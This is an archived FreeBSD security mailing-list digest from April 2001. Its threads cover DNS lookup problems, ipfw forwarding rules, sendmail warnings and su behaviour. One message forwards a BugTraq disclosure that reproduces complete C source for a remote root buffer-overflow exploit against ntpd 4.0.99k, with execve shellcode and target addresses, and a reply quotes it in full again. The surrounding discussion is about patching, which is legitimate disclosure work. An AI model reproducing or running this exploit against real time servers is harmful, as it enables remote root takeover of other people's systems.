Received: from tuna.rsa.com (tuna.rsa.com [10.80.211.153]) by sdtihq24.securid.com (Pro-8.9.3/Pro-8.9.3) with ESMTP id MAA08875 for ; Wed, 4 Apr 2001 12:10:07 -0400 (EDT)
Received: from rsasecurity.com ([10.81.217.239]) by tuna.rsa.com (8.8.8+Sun/8.8.8) with ESMTP id JAA24088 for ; Wed, 4 Apr 2001 09:10:16 -0700 (PDT)
From: dfinkelstein@rsasecurity.com
Message-Id: <200104041610.JAA24088@tuna.rsa.com>
X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4
X-Exmh-Isig-CompType: unknown
X-Exmh-Isig-Folder: lists/freebsd-mobile
To: freebsd-security@freebsd.org
Subject: Name lookup strageness
Mime-Version: 1.0
Content-Type: text/plain
Date: Wed, 04 Apr 2001 09:10:05 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Greetings,

I've seen something strange on my box and I was hoping somebody could provide some insight.

I'm running a 4.1.1 install with the patch for ipfw "established" rules (advisory FreeBSD-SA-01:08). The box runs ipfw and natd. I run no servers (no sendmail, bind, etc.) except for sshd and lpd; I have firewall rules that prohibit connections to these services unless the connection came from my internal network. I do name lookups to my ISP's name servers (my firewall rules only allow UDP traffic to/from port 53 on these servers).

On three occasions now (about a week or two apart), I've found that my box will no longer resolve names. Network connectivity is otherwise unaffected, and all my configuration seems to be unchanged (boxes on my internal network are still able to do name lookups to my ISP's name servers). When this happens, I have only been able to fix the problem by rebooting.
Now, the interesting (to me) thing is, when this happens and I try to resolve a name, I see the following sorts of entries in my firewall log:

Apr 3 20:40:07 balagan /kernel: ipfw: 65435 Deny UDP my.freebsd.ip.addr:53 some.nearby.ip.addr:1529 out via tun0
Apr 3 20:40:12 balagan /kernel: ipfw: 65435 Deny UDP my.freebsd.ip.addr:53 some.nearby.ip.addr:1529 out via tun0
Apr 3 20:40:22 balagan /kernel: ipfw: 65435 Deny UDP my.freebsd.ip.addr:53 some.nearby.ip.addr:1530 out via tun0
Apr 3 20:51:58 balagan /kernel: ipfw: 65435 Deny UDP my.freebsd.ip.addr:53 some.nearby.ip.addr:1531 out via tun0

So when I type "nslookup somehost" my box attempts to connect to some other machine at numerically increasing port numbers. The three times this has happened, the scan has started at different numbers. The target machine is not one of my name servers; once it was on my local subnet, and twice it was on a "nearby" subnet (same ISP as me but the last two octets of the address differed).

Does anybody have any ideas about what is going on, or other things I should look for when this happens to try to trace the problem?

Thanks,
--- David

From owner-freebsd-security Wed Apr 4 13:53:32 2001
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id D355437B71F for ; Wed, 4 Apr 2001 13:53:27 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id OAA08189; Wed, 4 Apr 2001 14:53:14 -0600 (MDT)
Message-Id: <4.3.2.7.2.20010404145126.04484250@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Wed, 04 Apr 2001 14:53:09 -0600
To: Christoph Kukulies , freebsd-security@FreeBSD.ORG
From: Brett Glass
Subject: Re: sendmail (possible attack) in logs
In-Reply-To: <200104041527.f34FRB571384@gilberto.physik.rwth-aachen.de>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

If you have clients running Microsoft Outhou... er, Outlook, you should be concerned. It's susceptible to exploits delivered via extra-long MIME headers.

--Brett

At 09:27 AM 4/4/2001, Christoph Kukulies wrote:
>I'm seeing this for a couple of days now in my /var/log/messages:
>
>Apr 3 18:28:12 gil sendmail[63971]: f33GSBt63970: Truncated MIME Content-Type h
>eader due to field size (possible attack)
>
>Do I need to be concerned?
>
>--
>Chris Christoph P. U. Kukulies kuku@gil.physik.rwth-aachen.de
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Apr 4 14:20:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cody.jharris.com (cody.jharris.com [205.238.128.83]) by hub.freebsd.org (Postfix) with ESMTP id 2A66337B71F for ; Wed, 4 Apr 2001 14:20:29 -0700 (PDT) (envelope-from nick@rogness.net)
Received: from localhost (nick@localhost) by cody.jharris.com (8.11.1/8.9.3) with ESMTP id f34MNq508054; Wed, 4 Apr 2001 17:23:52 -0500 (CDT) (envelope-from nick@rogness.net)
Date: Wed, 4 Apr 2001 17:23:51 -0500 (CDT)
From: Nick Rogness
X-Sender: nick@cody.jharris.com
To: "Crist J. Clark"
Cc: Matthew Reimer , owensmk@earthlink.net, security@FreeBSD.ORG
Subject: Re: Multiple Default Gateways using DIVERT
In-Reply-To: <3ACAE8CE.F9223E28@alum.mit.edu>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 4 Apr 2001, Crist J. Clark wrote:

> Matthew Reimer wrote:
> >
> > This might be a start, though I'm not sure how NAT should fit in. You'll
> > need the IPFIREWALL and IPFIREWALL_FORWARD kernel options.
> >
> > ipfw add 1000 fwd 2.2.2.1 ip from 10.10.10.0/25 to any
> > ipfw add 2000 fwd 2.2.2.2 ip from 10.10.10.128/25 to any
>
> Neither of the two responses I saw looked like they would do what the
> original
> poster wanted. It is a start, but this one will not work as shown with
> natd. The search will terminate with the above rules, before being
> divert(4)ed.

add 200 fwd 2.2.2.2 ip from 10.10.10.128/25 to any out recv ed0 xmit de0
add 300 divert natd ip from any to any de0

IIRC, the above rule 200 will match the inbound packet from ed0, change the next hop address, then be re-run through the firewall on the way out the interface de0 (rule 300 above) to the destination.

I've tested this with a log rule at 250 and it seems to match the outbound packet, so I'm assuming this will work.

Since he specified in a later email that 2.2.2.2 and 2.2.2.1 are on the same outbound interface, you could get away with running 1 natd, as both subnet's traffic would return via the same interface...regardless of where it came from.

However, the catch is on outbound traffic. The second DSL provider must allow the alias address of 1st DSL's provider through their gateways (not likely).

Therefore, what Crist suggested would work pretty damn well. There are several variations of that ruleset provided that could work.

Nick Rogness
- Keep on Routing in a Free World...
"FreeBSD: The Power to Serve!"
From owner-freebsd-security Wed Apr 4 14:39:12 2001
Delivered-To: freebsd-security@freebsd.org
Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id 0727037B71C for ; Wed, 4 Apr 2001 14:39:08 -0700 (PDT) (envelope-from cjclark@alum.mit.edu)
Received: from alum.mit.edu ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GBAESO00.P8M; Wed, 4 Apr 2001 14:38:48 -0700
Message-ID: <3ACB947D.16A66B4C@alum.mit.edu>
Date: Wed, 04 Apr 2001 14:39:09 -0700
From: Crist Clark
Organization: Globalstar LP
X-Mailer: Mozilla 4.75 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Nick Rogness
Cc: "Crist J. Clark" , Matthew Reimer , owensmk@earthlink.net, security@FreeBSD.ORG
Subject: Re: Multiple Default Gateways using DIVERT
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Nick Rogness wrote:
>
> On Wed, 4 Apr 2001, Crist J. Clark wrote:
>
> > Matthew Reimer wrote:
> > >
> > > This might be a start, though I'm not sure how NAT should fit in. You'll
> > > need the IPFIREWALL and IPFIREWALL_FORWARD kernel options.
> > >
> > > ipfw add 1000 fwd 2.2.2.1 ip from 10.10.10.0/25 to any
> > > ipfw add 2000 fwd 2.2.2.2 ip from 10.10.10.128/25 to any
> >
> > Neither of the two responses I saw looked like they would do what the
> > original
> > poster wanted. It is a start, but this one will not work as shown with
> > natd. The search will terminate with the above rules, before being
> > divert(4)ed.
>
> add 200 fwd 2.2.2.2 ip from 10.10.10.128/25 to any out recv ed0 xmit de0
> add 300 divert natd ip from any to any de0
>
> IIRC, the above rule 200 will match the inbound packet from ed0,
> change the next hop address, then be re-run through the firewall
> on the way out the interface de0 (rule 300 above) to the
> destination.
>
> I've tested this with a log rule at 250 and it seems to match the
> outbound packet, so I'm assuming this will work.

I don't think it will. That rule 200 should not work as you say. From ipfw(8),

     fwd ipaddr[,port]
             ... If the IP is not a local ad-
             dress then the port number (if specified) is ignored and
             the rule only applies to packets leaving the system.
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

I am unsure how it would break tho'. That is, whether the packets fall in the bitbucket when processed on ed0 or if they get shortcircuited to the wire before getting to 300 when the packet crosses de0.

--
Crist J. Clark cjclark@alum.mit.edu

From owner-freebsd-security Wed Apr 4 15:30:48 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cody.jharris.com (cody.jharris.com [205.238.128.83]) by hub.freebsd.org (Postfix) with ESMTP id C15C537B72F for ; Wed, 4 Apr 2001 15:30:44 -0700 (PDT) (envelope-from nick@rogness.net)
Received: from localhost (nick@localhost) by cody.jharris.com (8.11.1/8.9.3) with ESMTP id f34NXnY08334; Wed, 4 Apr 2001 18:33:50 -0500 (CDT) (envelope-from nick@rogness.net)
Date: Wed, 4 Apr 2001 18:33:49 -0500 (CDT)
From: Nick Rogness
X-Sender: nick@cody.jharris.com
To: Crist Clark
Cc: "Crist J. Clark" , Matthew Reimer , owensmk@earthlink.net, security@FreeBSD.ORG
Subject: Re: Multiple Default Gateways using DIVERT
In-Reply-To: <3ACB947D.16A66B4C@alum.mit.edu>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 4 Apr 2001, Crist Clark wrote:

> > add 200 fwd 2.2.2.2 ip from 10.10.10.128/25 to any out recv ed0 xmit de0
> > add 300 divert natd ip from any to any de0
> >
> > IIRC, the above rule 200 will match the inbound packet from ed0,
> > change the next hop address, then be re-run through the firewall
> > on the way out the interface de0 (rule 300 above) to the
> > destination.
> >
> > I've tested this with a log rule at 250 and it seems to match the
> > outbound packet, so I'm assuming this will work.
>
> I don't think it will. That rule 200 should not work as you say. From
> ipfw(8),

That's odd. When I add to the above ruleset:

add 250 log ip from any to any out via de0

I see the packet going outbound...

>
> fwd ipaddr[,port]
> ... If the IP is not a local ad-
> dress then the port number (if specified) is
> ignored and
> the rule only applies to packets leaving the system.
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> I am unsure how it would break tho'. That is, whether the packets fall
> in the bitbucket when processed on ed0 or if they get shortcircuited to
> the wire before getting to 300 when the packet crosses de0.

I'm not sure on this one, I'll send some actual logs in a while when I get home.

Nick Rogness
- Keep on Routing in a Free World...
"FreeBSD: The Power to Serve!"
From owner-freebsd-security Wed Apr 4 16:47:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail2.insweb.com (mail2.insweb.com [204.254.158.36]) by hub.freebsd.org (Postfix) with ESMTP id 5C9C937B43E for ; Wed, 4 Apr 2001 16:46:58 -0700 (PDT) (envelope-from fbsd-secure@ursine.com)
Received: from ursine.com (dhcp-4-45-203.users.insweb.com [10.4.45.203]) by mail2.insweb.com (8.11.0/8.11.0) with ESMTP id f34NkhT42184 for ; Wed, 4 Apr 2001 16:46:52 -0700 (PDT) (envelope-from fbsd-secure@ursine.com)
Message-ID: <3ACBB263.2804E9C2@ursine.com>
Date: Wed, 04 Apr 2001 16:46:43 -0700
From: Michael Bryan
X-Mailer: Mozilla 4.76 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: Fwd: ntpd =< 4.0.99k remote buffer overflow
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Heads up. This just came across BugTraq, will likely affect FreeBSD.
As of 4.2-RELEASE, the ntpd that ships with FreeBSD is 4.0.99b.

-------- Original Message --------
From: Przemyslaw Frasunek
Subject: ntpd =< 4.0.99k remote buffer overflow
To: BUGTRAQ@SECURITYFOCUS.COM

/* ntpd remote root exploit / babcia padlina ltd. */

/*
 * Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerable
 * to remote buffer overflow attack. It occurs when building response for
 * a query with large readvar argument. In almost all cases, ntpd is running
 * with superuser privileges, allowing to gain REMOTE ROOT ACCESS to timeserver.
 *
 * Although it's a normal buffer overflow, exploiting it is much harder.
 * Destination buffer is accidentally damaged, when attack is performed, so
 * shellcode can't be larger than approx. 70 bytes. This proof of concept code
 * uses small execve() shellcode to run /tmp/sh binary. Full remote attack
 * is possible.
 *
 * NTP is stateless UDP based protocol, so all malicious queries can be
 * spoofed.
 *
 * Example of use on generic RedHat 7.0 box:
 *
 * [venglin@cipsko venglin]$ cat dupa.c
 * main() { setreuid(0,0); system("chmod 4755 /bin/sh"); }
 * [venglin@cipsko venglin]$ cc -o /tmp/sh dupa.c
 * [venglin@cipsko venglin]$ cc -o ntpdx ntpdx.c
 * [venglin@cipsko venglin]$ ./ntpdx -t2 localhost
 * ntpdx v1.0 by venglin@freebsd.lublin.pl
 *
 * Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh)
 *
 * RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query
 * [1] <- evil query (pkt = 512 | shell = 45)
 * [2] <- null query (pkt = 12)
 * Done.
 * /tmp/sh was spawned.
* [venglin@cipsko venglin]$ ls -al /bin/bash * -rwsr-xr-x 1 root root 512540 Aug 22 2000 /bin/bash * */ #include #include #include #include #include #include #include #include #include #include #define NOP 0x90 #define ADDRS 8 #define PKTSIZ 512 static char usage[] = "usage: ntpdx [-o offset] <-t type> "; /* generic execve() shellcodes */ char lin_execve[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/sh"; char bsd_execve[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; struct platforms { char *os; char *version; char *code; long ret; int align; int shalign; int port; }; /* Platforms. Notice, that on FreeBSD shellcode must be placed in packet * *after* RET address. This values will vary from platform to platform. 
*/ struct platforms targ[] = { { "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve, 0xbfbff8bc, 200, 220, 0 }, { "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve, 0xbfbff540, 200, 220, 0 }, { "RedHat Linux 7.0", "4.0.99k-RPM (/tmp/sh)", lin_execve, 0xbffff777, 240, 160, 0 }, { NULL, NULL, NULL, 0x0, 0, 0, 0 } }; long getip(name) char *name; { struct hostent *hp; long ip; extern int h_errno; if ((ip = inet_addr(name)) < 0) { if (!(hp = gethostbyname(name))) { fprintf(stderr, "gethostbyname(): %s\n", strerror(h_errno)); exit(1); } memcpy(&ip, (hp->h_addr), 4); } return ip; } int doquery(host, ret, shellcode, align, shalign) char *host, *shellcode; long ret; int align, shalign; { /* tcpdump-based reverse engineering :)) */ char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61, 0x74, 0x75, 0x6d, 0x3d }; char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; char buf[PKTSIZ], *p; long *ap; int i; int sockfd; struct sockaddr_in sa; bzero(&sa, sizeof(sa)); sa.sin_family = AF_INET; sa.sin_port = htons(123); sa.sin_addr.s_addr = getip(host); if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) { perror("socket"); return -1; } if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0) { perror("connect"); close(sockfd); return -1; } memset(buf, NOP, PKTSIZ); memcpy(buf, q2, sizeof(q2)); p = buf + align; ap = (unsigned long *)p; for(i=0;i; Wed, 4 Apr 2001 16:56:03 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f34Ntvt52567; Thu, 5 Apr 2001 01:55:57 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Michael Bryan Cc: freebsd-security@FreeBSD.ORG Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow In-Reply-To: Your message of "Wed, 04 Apr 2001 16:46:43 PDT." <3ACBB263.2804E9C2@ursine.com> Date: Thu, 05 Apr 2001 01:55:57 +0200 Message-ID: <52565.986428557@critter> 
From: Poul-Henning Kamp
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

This has already been fixed in FreeBSD current & stable an hour ago or so.

Poul-Henning

In message <3ACBB263.2804E9C2@ursine.com>, Michael Bryan writes:
>
>Heads up. This just came across BugTraq, will likely affect FreeBSD.
>As of 4.2-RELEASE, the ntpd that ships with FreeBSD is 4.0.99b.
>
>
>-------- Original Message --------
>From: Przemyslaw Frasunek >Subject: ntpd =< 4.0.99k remote buffer overflow >To: BUGTRAQ@SECURITYFOCUS.COM > >/* ntpd remote root exploit / babcia padlina ltd. */ > >/* > * Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerable > * to remote buffer overflow attack. It occurs when building response for > * a query with large readvar argument. In almost all cases, ntpd is running > * with superuser privileges, allowing to gain REMOTE ROOT ACCESS to timeserver. > * > * Althought it's a normal buffer overflow, exploiting it is much harder. > * Destination buffer is accidentally damaged, when attack is performed, so > * shellcode can't be larger than approx. 70 bytes. This proof of concept code > * uses small execve() shellcode to run /tmp/sh binary. Full remote attack > * is possible. > * > * NTP is stateless UDP based protocol, so all malicious queries can be > * spoofed. > * > * Example of use on generic RedHat 7.0 box: > * > * [venglin@cipsko venglin]$ cat dupa.c > * main() { setreuid(0,0); system("chmod 4755 /bin/sh"); } > * [venglin@cipsko venglin]$ cc -o /tmp/sh dupa.c > * [venglin@cipsko venglin]$ cc -o ntpdx ntpdx.c > * [venglin@cipsko venglin]$ ./ntpdx -t2 localhost > * ntpdx v1.0 by venglin@freebsd.lublin.pl > * > * Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh) > * > * RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query > * [1] <- evil query (pkt = 512 | shell = 45) > * [2] <- null query (pkt = 12) > * Done. > * /tmp/sh was spawned. 
> * [venglin@cipsko venglin]$ ls -al /bin/bash > * -rwsr-xr-x 1 root root 512540 Aug 22 2000 /bin/bash > * > */ > >#include >#include >#include >#include >#include >#include >#include >#include >#include >#include > >#define NOP 0x90 >#define ADDRS 8 >#define PKTSIZ 512 > >static char usage[] = "usage: ntpdx [-o offset] <-t type> "; > >/* generic execve() shellcodes */ > >char lin_execve[] = > "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" > "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" > "\x80\xe8\xdc\xff\xff\xff/tmp/sh"; > >char bsd_execve[] = > "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" > "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" > "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/sh\x01\x01\x01\x01" > "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; > >struct platforms >{ > char *os; > char *version; > char *code; > long ret; > int align; > int shalign; > int port; >}; > >/* Platforms. Notice, that on FreeBSD shellcode must be placed in packet > * *after* RET address. This values will vary from platform to platform. 
> */ > >struct platforms targ[] = >{ > { "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve, > 0xbfbff8bc, 200, 220, 0 }, > > { "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve, > 0xbfbff540, 200, 220, 0 }, > > { "RedHat Linux 7.0", "4.0.99k-RPM (/tmp/sh)", lin_execve, > 0xbffff777, 240, 160, 0 }, > > { NULL, NULL, NULL, 0x0, 0, 0, 0 } >}; > >long getip(name) >char *name; >{ > struct hostent *hp; > long ip; > extern int h_errno; > > if ((ip = inet_addr(name)) < 0) > { > if (!(hp = gethostbyname(name))) > { > fprintf(stderr, "gethostbyname(): %s\n", > strerror(h_errno)); > exit(1); > } > memcpy(&ip, (hp->h_addr), 4); > } > > return ip; >} > >int doquery(host, ret, shellcode, align, shalign) >char *host, *shellcode; >long ret; >int align, shalign; >{ > /* tcpdump-based reverse engineering :)) */ > > char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61, > 0x74, 0x75, 0x6d, 0x3d }; > > char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x00, 0x00 }; > > char buf[PKTSIZ], *p; > long *ap; > int i; > > int sockfd; > struct sockaddr_in sa; > > bzero(&sa, sizeof(sa)); > > sa.sin_family = AF_INET; > sa.sin_port = htons(123); > sa.sin_addr.s_addr = getip(host); > > if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) > { > perror("socket"); > return -1; > } > > if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0) > { > perror("connect"); > close(sockfd); > return -1; > } > > memset(buf, NOP, PKTSIZ); > memcpy(buf, q2, sizeof(q2)); > > p = buf + align; > ap = (unsigned long *)p; > > for(i=0;i *ap++ = ret; > > p = (char *)ap; > > memcpy(buf+shalign, shellcode, strlen(shellcode)); > > if((write(sockfd, buf, PKTSIZ)) < 0) > { > perror("write"); > close(sockfd); > return -1; > } > > fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ, > strlen(shellcode)); > fflush(stderr); > > if ((write(sockfd, q3, sizeof(q3))) < 0) > { > perror("write"); > close(sockfd); > return 
-1; > } > > fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3)); > fflush(stderr); > > close(sockfd); > return 0; >} > >int main(argc, argv) >int argc; >char **argv; >{ > extern int optind, opterr; > extern char *optarg; > int ch, type, ofs, i; > long ret; > > opterr = ofs = 0; > type = -1; > > while ((ch = getopt(argc, argv, "t:o:")) != -1) > switch((char)ch) > { > case 't': > type = atoi(optarg); > break; > > case 'o': > ofs = atoi(optarg); > break; > > case '?': > default: > puts(usage); > exit(0); > > } > > argc -= optind; > argv += optind; > > fprintf(stderr, "ntpdx v1.0 by venglin@freebsd.lublin.pl\n\n"); > > if (type < 0) > { > fprintf(stderr, "Please select platform:\n"); > for (i=0;targ[i].os;i++) > { > fprintf(stderr, "\t-t %d : %s %s (%p)\n", i, > targ[i].os, targ[i].version, (void *)targ[i].ret); > } > > exit(0); > } > > fprintf(stderr, "Selected platform: %s with ntpd %s\n\n", > targ[type].os, targ[type].version); > > ret = targ[type].ret; > ret += ofs; > > if (argc != 1) > { > puts(usage); > exit(0); > } > > fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending query\n", > (void *)ret, targ[type].align, targ[type].shalign); > > if (doquery(*argv, ret, targ[type].code, targ[type].align, > targ[type].shalign) < 0) > { > fprintf(stderr, "Failed.\n"); > exit(1); > } > > fprintf(stderr, "Done.\n"); > > if (!targ[type].port) > { > fprintf(stderr, "/tmp/sh was spawned.\n"); > exit(0); > } > > exit(0); >} > >-- >* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * >* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF * > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. 
From owner-freebsd-security Wed Apr 4 17: 7: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from meow.osd.bsdi.com (meow.osd.bsdi.com [204.216.28.88]) by hub.freebsd.org (Postfix) with ESMTP id 85CAB37B43E; Wed, 4 Apr 2001 17:06:57 -0700 (PDT) (envelope-from jhb@FreeBSD.org)
Received: from laptop.baldwin.cx (john@jhb-laptop.osd.bsdi.com [204.216.28.241]) by meow.osd.bsdi.com (8.11.2/8.11.2) with ESMTP id f3506TG52369; Wed, 4 Apr 2001 17:06:29 -0700 (PDT) (envelope-from jhb@FreeBSD.org)
Message-ID:
X-Mailer: XFMail 1.4.0 on FreeBSD
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
In-Reply-To: <002d01c0bc6d$2d558390$035778d8@sherline.net>
Date: Wed, 04 Apr 2001 17:06:02 -0700 (PDT)
From: John Baldwin
To: Jeremiah Gowdy
Subject: Re: su change?
Cc: freebsd-security@FreeBSD.org, freebsd-stable@FreeBSD.org, Kherry Zamore , Matthew Emmerton
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 03-Apr-01 Jeremiah Gowdy wrote:
>
>> > if (!chshell(pwd->pw_shell) && ruid)
>> > errx(1, "permission denied (shell).");
>> >
>> > The only thing we need to prepend to this is a check to see if we are
>> trying
>> > to su to root, which we should allow regardless of the shell specified:
>>
>> I disagree. The root account is an account that needs to have the highest
>> number of security checks present.
>
> Then make a point as to why root, when not having a valid shell, not being
> able to log in is a useful security check in any way shape or form. So

Last time I checked single-user was a shape.

The real problem here is people changing root's shell. You shouldn't be logging in as root in the first place. I remember back in the 2.1.x and 2.2.x days when .cshrc actually used to yell at people if you logged in as root. Use sudo, supser, su2, or su -m instead. Root's login shell and login shell files should be kept simple and sane and not dinked with. This is a people problem with the administrators in question and hacking up su is not the right fix.

--

John Baldwin -- http://www.FreeBSD.org/~jhb/
PGP Key: http://www.baldwin.cx/~john/pgpkey.asc
"Power Users Use the Power to Serve!" - http://www.FreeBSD.org/

From owner-freebsd-security Wed Apr 4 17:10:44 2001
Delivered-To: freebsd-security@freebsd.org
Received: from fangg.lbl.gov (fangg.lbl.gov [128.3.1.103]) by hub.freebsd.org (Postfix) with ESMTP id 57F0737B423 for ; Wed, 4 Apr 2001 17:10:23 -0700 (PDT) (envelope-from dart@nersc.gov)
Received: from usul.nersc.gov (usul [192.168.1.115]) by fangg.lbl.gov (Postfix) with ESMTP id 159BE1F55; Wed, 4 Apr 2001 17:10:23 -0700 (PDT)
Received: from usul.nersc.gov (localhost [127.0.0.1]) by usul.nersc.gov (Postfix) with ESMTP id 935A027; Wed, 4 Apr 2001 17:10:19 -0700 (PDT)
X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4
To: freebsd-security@FreeBSD.ORG
Cc: pat@databits.net
Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow
In-Reply-To: Message from Poul-Henning Kamp of "Thu, 05 Apr 2001 01:55:57 +0200." <52565.986428557@critter>
Mime-Version: 1.0
Content-Type: multipart/signed; boundary="==_Exmh_854596055P"; micalg=pgp-sha1; protocol="application/pgp-signature"
Content-Transfer-Encoding: 7bit
Date: Wed, 04 Apr 2001 17:10:19 -0700
From: Eli Dart
Message-Id: <20010405001019.935A027@usul.nersc.gov>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

--==_Exmh_854596055P
Content-Type: text/plain; charset=us-ascii

Any chance these changes could be propagated to the port? It's still 4.0.99k as of 5 minutes ago....ipf rules work in some cases, but not all......

--eli

In reply to Poul-Henning Kamp :

>
> This has already been fixed in FreeBSD current & stable an hour
> ago or so.
>
> Poul-Henning
>
>
> In message <3ACBB263.2804E9C2@ursine.com>, Michael Bryan writes:
> >
> >Heads up. This just came across BugTraq, will likely affect FreeBSD.
> >As of 4.2-RELEASE, the ntpd that ships with FreeBSD is 4.0.99b.
> >
> >
> >-------- Original Message --------
